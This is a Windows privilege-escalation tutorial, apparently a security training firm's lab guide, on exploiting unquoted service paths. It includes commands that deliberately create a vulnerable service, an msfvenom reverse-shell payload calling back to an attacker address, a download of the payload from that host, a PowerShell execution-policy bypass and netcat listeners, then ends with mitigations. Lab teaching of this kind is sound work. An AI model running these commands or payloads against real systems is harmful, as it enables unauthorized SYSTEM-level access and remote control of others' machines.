UNQUOTED SERVICE PATH

Contents
Introduction.......................................................................................3
Unquoted Service Path .................................................................................... 3
Vulnerability Insight ...........................................................................3
Prerequisite .......................................................................................3
Lab Setup ...........................................................................................4
Steps to Setup Vulnerable Environment........................................................... 5
Abusing Unquoted Service Paths ........................................................6
Mitigation ...................................................................................................... 11

Page 2 of 11
Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access
to Windows components including services, files, and registry entries. Exploiting the Unquoted Service
path is one technique to increase privileges.
Unquoted Path or Unquoted Service path is reported as a critical vulnerability in Windows, such
vulnerability allows an attacker to escalate the privilege for NT AUTHORITY/SYSTEM for a low-level
privilege user account.

Introduction
Unquoted Service Path
If the path to the service binary is not enclosed in quotes and contains white spaces, the name of a
loophole for an installed service is Service Unquoted Path. As a result, a local user will be able to elevate
the privilege to administrator privilege shell by placing an executable in a higher level directory within the
path.
Mitre ID: T1574.009
Tactics: Privilege Escalation & Persistence
Platforms: Windows

Vulnerability Insight
The Windows API must assume where to find the referenced application if the path contains spaces and
is not enclosed by quotation marks. If, for example, a service uses the unquoted path:
Vulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe
The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a
writeable directory.
C:\Program.exe
C:\Program Files\Ignite.exe
C:\Program Files\Ignite Data\Vuln.exe
C:\Program Files\Ignite Data\Vuln Service\file.exe

Prerequisite
Target Machine: Windows 10

Page 3 of 11
Attacker Machine: Kali Linux
Tools: SubinACL, PowerUP.ps1, Winpeas.
Condition: Compromise the target machine with low privilege access either using Metasploit or Netcat,
etc.
Objective: Escalate the NT Authority /SYSTEM privileges for a low privileged user by exploiting unquoted
path Vulnerability.

Lab Setup
To set up a vulnerable environment for Unquoted Path, we need user accounts. Here we have user
“ignite” who is a member of the Administrator group and “Shreya” who is a member Users group.

net user ignite

net user shreya

Page 4 of 11
Steps to Setup Vulnerable Environment
Step1: Create a new folder and Sub Folder and named it “Ignite Data” & “Vuln Service” respectively

mkdir "C:\Program Files\Ignite Data\Vuln Service"

Page 5 of 11
Step2: Create vulnerable service with name file.exe

sc create "vulns" binpath= "C:\Program Files\Ignite Data\Vuln Service\file.exe" start= auto

Step3: Grant writeable for BUILTIN\Users on Ignite Data folder with the help of icacls

icacls "C:\Program Files\Ignite Data" /grant "BUILTIN\Users":W

*icacls is Microsoft Windows native command-line programmes that can display and modify
permissions on directories and files.

Step4: To create a vulnerable service we need to assign some toxic privilege with the help
of SubinACL to change the permission of services.
NOTE:
SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools to work with
security permissions in Windows. This tool is capable of changing the permissions of files, folders, registry
keys, services, printers, cluster shares, and various other types of objects.
In this case, we have granted a user permissions to suspend (pause/continue), start, and stop (restart) a
service. The full list of the available service permissions:
Step5: After downloading SubinACL, execute the following command to assign PTO Permissions user
“ignite” against the “Pentest” service.

subinacl.exe /service vulns /grant=msedgewin10\shreya=PTO

Abusing Unquoted Service Paths

Abusing unquoted service is a technique that exploits insecure file permission in order to escalate
privileges for local users. Download the PowerUp.ps1 script inside Kali Linux which will return the name
and binary path for services with unquoted paths that also have a space in the name.

Page 6 of 11
 wget https://githubusercontent.com/PowerShellMafia/PowerSploit/master /Privesc/PowerUp.ps1
python -m SimpleHTTPServer 80

Get the initial access of the target machine and transfer the PowerUp.ps1 and execute the Get-
UnquotedService command that will use Get-WmiObject to query all win32_service objects and extract
out the binary pathname for each. Then check if any binary paths have a space and aren’t quoted.

nc -lvp 1245
powershell
wget http://192.168.1.3/PowerUp.ps1 -o PowerUP.ps1
powershell -ep bypass
Import-Module .\PowerUp.ps1
Get-UnquotedService

As result, we have enumerated the path for file.exe as highlighted in the below image.

Page 7 of 11
From above, we enumerate three subdirectories: “Program Files,” “Ignite Data,” and “Vuln Service,” and
for each directory, we use icacls to check permissions.

icacls "C:\Program Files"

icacls "C:\Program Files\Ignite Data"
icacls "C:\Program Files\Ignite Data\Vuln Service"

Here we found BUILTIN\Users owns writable permissions against “Ignite Data”

Page 8 of 11
Using auto script WinPEASx64 we enumerate the suspicious file and folder for the unquoted path.

winPEASx64.exe quiet servicesinfo

As result, it is shown the same as above.

Page 9 of 11
It’s time to exploit the weak configured services against unquoted paths in order to privilege for user
Shreya. As we know unquoted folder name is Vuln Service thus we will create a file with the name Vuln.exe
with the help of msfvenom.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > Vuln.exe

python –m SimpleHTTPServer 80

Start a fresh Netcat listener in a new terminal and transfer the Vuln.exe onto the target machine’s
“Ignite Data” folder. Since Shreya is a member of BUILTIN/Users has writable permission for “Ignite
Data, and restarting the service will result in a reverse connection.

cd c:\Program Files\Ignite Data

powershell wget http://192.168.1.3/Vuln.exe -o Vuln.exe
net start vulns

As soon as the service will launch, the attacker will get a reverse connection in the new netcat session as
NT Authority \system

nc -lvp 8888
whoami

Page 10 of 11
Even if the user has the option to restart the system, this approach will automatically restart the
Vuln.exe service, which will offer a reverse connection.

shutdown /r /t 0

As soon as the service will launch, the attacker will get a reverse connection in the new netcat session as
NT Authority \system

nc -lvp 8888

Mitigation
Vulnerability Solution: Ensure that any services that contain a space in the path enclose the path in
quotes.
Restrict File and Directory Permissions: Restrict access by setting directory and file permissions that are
not specific to users or privileged accounts
Execution Prevention: Block execution of code on a system through application control, and/or script
blocking.

Page 11 of 11
 JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in